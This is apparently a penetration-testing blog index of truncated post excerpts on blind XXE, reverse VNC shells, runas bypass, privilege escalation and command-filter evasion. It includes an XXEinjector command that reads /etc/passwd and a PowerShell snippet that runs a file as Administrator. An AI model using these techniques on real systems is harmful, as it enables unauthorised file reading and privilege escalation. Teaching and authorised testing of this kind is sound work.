sudo ruby XXEinjector.rb –host=127.0.0.1 –file=req.txt –path=/etc/passwd –httpport=800 –proxy=127.0.0.1:8080 –urlencode –ftpport=2221 –phpfilter –verboseXXE attacks have become part of the OWASP TOP10 in 2017 and should therefore have high attention. One type of XXE attack that is often overlooked is Blind XXE, which could allow for reading files, port scanning internally or even in rare cases remote code execution. […]

Repetitive tasks can normally be automated using simple methods. Yet, in penetration testing, many things are often done manually. Here are some quick tricks on how to automate some of the most common penetration testing tasks. The line below will open each IP and Port of all web servers (possibly determined with an nmap scan) in the iceweasel […]

The methods and scripts below may be used for transfering files. TFTP script  (bash) Replace directory to one of choice and run this bash script to setup a working tftp server and get guidance on how to download a file from the server. NB, the directory of choice will be exposed for anyone to download the files available in […]

It is often handy to transform a normal shell to a “GUI”. For example, sometimes the “run as administrator” option is enabled inside Windows with already entered credentials. To exploit this you would often need that GUI. One way of getting the GUI is to get a vnc service onto the target machine and instruct it to connect back to your attacking […]

To prevent privilege escalation, often the runas command is unavailable in Windows shells. To bypass this, the following may be pasted into a Powrshell or windows cmd to run a chosen command. echo $secpasswd = ConvertTo-SecureString “PASSWORD-HERE” -AsPlainText -Force > c:\Windows\temp\runas.ps1 echo $mycreds = New-Object System.Management.Automation.PSCredential (“Administrator”, $secpasswd) >> c:\Windows\temp\runas.ps1 echo $computer = “NAME-OF-COMPUTER-HERE”  >> c:\Windows\temp\runas.ps1 echo ‘[System.Diagnostics.Process]::cmd /c (“C:\Windows\temp\FILE-TO-RUNE.exe”,””,$mycreds.Username, $mycreds.Password, […]

Often, enumerating information with pure windows commands, requires administrator access. For example, it is normally not possible to enumerate which service listens on a specific ports with netstat -b if not admin. To overcome this, you can seperately fetch the listening port information and service information and then match the process ID of both. Then by searching the output for “localport” […]

Imagine the following scenario. You have gained access to a user with high privileges (not root), on a Linux server but you would like to escalate to root. There is no sudo command or other command for escalation available, What do you do? Here are two oneliners for escalating to root in Linux. Compiling binary, setting setUID […]

Sometimes there are restrictions in place for writing or executing commands or files. For example, you may have limited shell or have found a command injection vulnerability but there are filters in place for which commands or characters you may actually run. Here are some alternatives for running commands which may help bypassing such filters: The following […]